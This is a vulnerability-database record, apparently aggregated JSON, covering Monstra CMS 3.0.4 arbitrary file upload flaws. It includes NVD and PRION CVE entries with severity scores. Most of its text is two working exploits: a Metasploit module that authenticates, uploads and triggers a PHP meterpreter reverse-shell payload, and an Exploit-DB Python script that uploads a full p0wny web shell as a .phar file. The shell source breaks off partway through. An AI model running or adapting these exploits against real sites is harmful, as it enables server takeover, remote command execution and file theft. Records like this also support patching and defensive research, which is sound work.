["CVE-2017-18048"], "modified": "2018-07-12T00:00:00", "id": "1337DAY-ID-30704", "href": "https://0day.today/exploit/description/30704", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Monstra CMS Authenticated Arbitrary File Upload',\r\n 'Description' => %q{\r\n MonstraCMS 3.0.4 allows users to upload Arbitrary files which leads to remote command execution on the remote server.\r\n An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.\r\n This module was tested against MonstraCMS 3.0.4.\r\n },\r\n\r\n 'Author' =>\r\n [\r\n 'Ishaq Mohammed <[email\u00a0protected]>', # Discoverer & Proof of Concept\r\n 'Touhid M.Shaikh <touhidshaikh22[email\u00a0protected]>', # Metasploit Module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE','2017-18048'],\r\n ['EDB','43348'],\r\n ['URL','https://blogs.securiteam.com/index.php/archives/3559'],\r\n ['URL','https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1'],\r\n ['URL','https://www.youtube.com/watch?v=-ziZ6DELbzw']\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\r\n 'Encoder' => 'php/base64'\r\n },\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n ['Monstra CMS 3.0.4', { }],\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Dec 18 2017'))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"Base Monstra CMS directory path\", '/']),\r\n OptString.new('USERNAME', [ true, \"Username to authenticate with\", '']),\r\n OptString.new('PASSWORD', [ true, \"Password to authenticate with\", ''])\r\n ])\r\n end\r\n\r\n def check\r\n begin\r\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'admin', 'index.php') })\r\n rescue\r\n vprint_error(\"Unable to access the index.php file\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n if res and res.code != 200\r\n vprint_error(\"Error accessing the index.php file\")\r\n return CheckCode::Unknown\r\n end\r\n\r\n if res.body =~ /<\\/a>.*?Version (\\d+\\.\\d+\\.\\d+)/i\r\n version = Gem::Version.new($1)\r\n vulnVersion = Gem::Version.new('3.0.4')\r\n vprint_status(\"Monstra CMS: #{version}\")\r\n\r\n if version > vulnVersion\r\n return CheckCode::Safe\r\n elsif version == vulnVersion\r\n return CheckCode::Appears\r\n elsif version < vulnVersion\r\n return CheckCode::Detected\r\n end\r\n end\r\n end\r\n\r\n def uri\r\n target_uri.path\r\n end\r\n\r\n def login\r\n res = nil\r\n vprint_status('Trying to Login ......')\r\n # Send Creds with cookies.\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'admin', 'index.php'),\r\n 'vars_post' => {\r\n 'login' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD'],\r\n 'login_submit' => 'Log+In'\r\n }\r\n })\r\n cookies = res.get_cookies\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Did not respond to Login request\") if res.nil?\r\n\r\n # Try to access index page with authenticated cookie.\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'admin' '/index.php'),\r\n 'cookie' => cookies\r\n })\r\n fail_with(Failure::Unreachable, \"#{peer} - Did not respond to Login request\") if res.nil?\r\n\r\n # if we redirect to core_welcome then we assume we have authenticated cookie.\r\n if res.code == 302 && res.headers['Location'].include?('index.php?id=dashboard')\r\n print_good(\"Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]\")\r\n store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])\r\n return cookies\r\n else\r\n fail_with(Failure::Unreachable, \"#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]\")\r\n end\r\n end\r\n\r\n def exploit\r\n #Login Function Execute and Return Cookies\r\n cookies = login\r\n\r\n #Random payload name.\r\n pay_name = \"#{rand_text_alpha(5..10)}.PHP\"\r\n\r\n\r\n # Payload Gen.\r\n evilbyte = \"<?php #{payload.encoded}; ?>\"\r\n\r\n # Request for CSRF token for file upload.\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'admin', '/index.php'),\r\n 'vars_get' => {'id' => 'filesmanager'},\r\n 'method' => 'GET',\r\n 'cookie' => cookies\r\n })\r\n\r\n # Grabbing CSRF token from body\r\n /<input type=\"hidden\" id=\"csrf\" name=\"csrf\" value=\"(?<csrf>[a-z0-9\"]+)\">/ =~ res.body\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not determine CSRF token\") if csrf.nil?\r\n vprint_good(\"CSRF-Token for File Upload : #{csrf}\")\r\n\r\n # setup POST request.\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"csrf\"') # CSRF token #form-data; name=\"file\"; filename=\"agent22.PHP\"\r\n post_data.add_part(\"#{evilbyte}\", content_type = 'application/x-php', transfer_encoding = nil, content_disposition = \"form-data; name=\\\"file\\\"; filename=\\\"#{pay_name}\\\"\") # payload\r\n post_data.add_part(\"Upload\", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name=\"upload_file\"') # extra\r\n data = post_data.to_s\r\n\r\n vprint_status(\"Trying to upload file #{pay_name} with malicious content....\")\r\n # Lets Send Upload request.\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'admin', '/index.php'),\r\n 'vars_get' => {'id' => 'filesmanager'},\r\n 'method' => 'POST',\r\n 'cookie' => cookies,\r\n 'Connection' => 'close',\r\n 'data' => data,\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\r\n })\r\n\r\n # Cleanup delete payload after get meterpreter.\r\n register_files_for_cleanup(pay_name)\r\n\r\n\r\n # Execute our payload simply call to payload.\r\n print_status(\"Executing Payload \" )\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => normalize_uri(uri, 'public', 'uploads', pay_name)\r\n })\r\n\r\n end\r\nend\n\n# 0day.today [2018-07-12] #", "sourceHref": "https://0day.today/exploit/30704", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2023-12-07T16:12:45", "description": "Monstra CMS through 3.0.4 has an incomplete \"forbidden types\" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-29T18:29:00", "type": "cve", "title": "CVE-2018-6383", "cwe": ["CWE-184"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048", "CVE-2018-6383"], "modified": "2022-02-10T07:23:00", "cpe": ["cpe:/a:monstra:monstra:3.0.4"], "id": "CVE-2018-6383", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-6383", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T14:54:58", "description": "Monstra CMS 3.0.4 allows users to upload arbitrary files, which leads to remote command execution on the server, for example because .php (lowercase) is blocked but .PHP (uppercase) is not.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-23T06:29:00", "type": "cve", "title": "CVE-2017-18048", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048"], "modified": "2018-02-08T16:28:00", "cpe": ["cpe:/a:monstra:monstra:3.0.4"], "id": "CVE-2017-18048", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18048", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:17:27", "description": "Monstra CMS 3.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via admin/index.php?id=filesmanager because, for example, .php filenames are blocked but .php7 filenames are not, a related issue to CVE-2017-18048.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-22T05:15:00", "type": "cve", "title": "CVE-2020-13384", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048", "CVE-2020-13384"], "modified": "2020-05-26T16:43:00", "cpe": ["cpe:/a:monstra:monstra:3.0.4"], "id": "CVE-2020-13384", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13384", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:monstra:monstra:3.0.4:*:*:*:*:*:*:*"]}], "prion": [{"lastseen": "2023-11-22T02:49:50", "description": "Monstra CMS through 3.0.4 has an incomplete \"forbidden types\" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-29T18:29:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048", "CVE-2018-6383"], "modified": "2022-02-10T07:23:00", "id": "PRION:CVE-2018-6383", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2018-6383", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T03:09:36", "description": "Monstra CMS 3.0.4 allows users to upload arbitrary files, which leads to remote command execution on the server, for example because .php (lowercase) is blocked but .PHP (uppercase) is not.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-23T06:29:00", "type": "prion", "title": "Command injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048"], "modified": "2018-02-08T16:28:00", "id": "PRION:CVE-2017-18048", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2017-18048", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-11-22T01:18:03", "description": "Monstra CMS 3.0.4 allows remote authenticated users to upload and execute arbitrary PHP code via admin/index.php?id=filesmanager because, for example, .php filenames are blocked but .php7 filenames are not, a related issue to CVE-2017-18048.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-22T05:15:00", "type": "prion", "title": "Sql injection", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-18048", "CVE-2020-13384"], "modified": "2020-05-26T16:43:00", "id": "PRION:CVE-2020-13384", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2020-13384", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-12-07T18:49:57", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-04T00:00:00", "type": "exploitdb", "title": "Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2018-6383", "CVE-2017-18048", "CVE-2018-6383"], "modified": "2021-06-04T00:00:00", "id": "EDB-ID:49949", "href": "https://www.exploit-db.com/exploits/49949", "sourceData": "# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)\r\n# Date: 03.06.2021\r\n# Exploit Author: Ron Jost (hacker5preme)\r\n# Vendor Homepage: https://monstra.org/\r\n# Software Link: https://monstra.org/monstra-3.0.4.zip\r\n# Version: 3.0.4\r\n# Tested on: Ubuntu 20.04\r\n# CVE: CVE-2018-6383\r\n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit\r\n\r\n'''\r\nDescription:\r\nMonstra CMS through 3.0.4 has an incomplete \"forbidden types\" list that excludes .php (and similar) file extensions\r\nbut not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code\r\n by uploading a file, a different vulnerability than CVE-2017-18048.\r\n'''\r\n\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport argparse\r\nimport requests\r\n\r\n\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383')\r\nmy_parser.add_argument('-T', type=str, help='Target IP')\r\nmy_parser.add_argument('-P', type=str, help='Target Port')\r\nmy_parser.add_argument(\"-U\", type=str, help=\"Monstra CMS Path\")\r\nmy_parser.add_argument('-u', type=str, help=\"Username\")\r\nmy_parser.add_argument('-p', type=str, help='Password')\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.T\r\ntarget_port = args.P\r\nMonstracms_path = args.U\r\nusername = args.u\r\npassword = args.p\r\n\r\n\r\n'''\r\nExploit:\r\n'''\r\n# Cookies:\r\nsession = requests.Session()\r\nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php'\r\ncookies = session.get(url).cookies.get_dict()\r\nvalue = cookies['PHPSESSID']\r\ncookies = {\r\n \"__atuvc\": \"9%7C22\",\r\n 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9'\r\n}\r\n\r\n# Construct authentication header:\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Content-Type\": \"application/x-www-form-urlencoded\",\r\n \"Origin\": \"http://\" + target_ip,\r\n \"Connection\": \"close\",\r\n \"Referer\": \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php',\r\n \"Upgrade-Insecure-Requests\": \"1\"}\r\n\r\n# Construct authentication body\r\nbody = {\r\n \"login\": username,\r\n \"password\": password,\r\n \"login_submit\": \"Log In\"}\r\nx = requests.post(url, headers=headers, cookies=cookies, data=body)\r\n\r\n# Construct Exploit link:\r\nurl = \"http://\" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager'\r\n\r\n# Construct Exploit header:\r\nheader = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------27822155982314896762160847658\",\r\n \"Origin\": \"http://\" + target_ip,\r\n \"Connection\": \"close\",\r\n \"Referer\": \"http://\" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager',\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n}\r\n\r\n# Construct Exploit data:\r\nburp0_data = \"-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"csrf\\\"\\r\\n\\r\\n1e71963993909d612c40962b401c556b70e9bb3c\\r\\n-----------------------------27822155982314896762160847658\\r\\nContent-Disposition: form-data; name=\\\"file\\\"; filename=\\\"shell.phar\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n 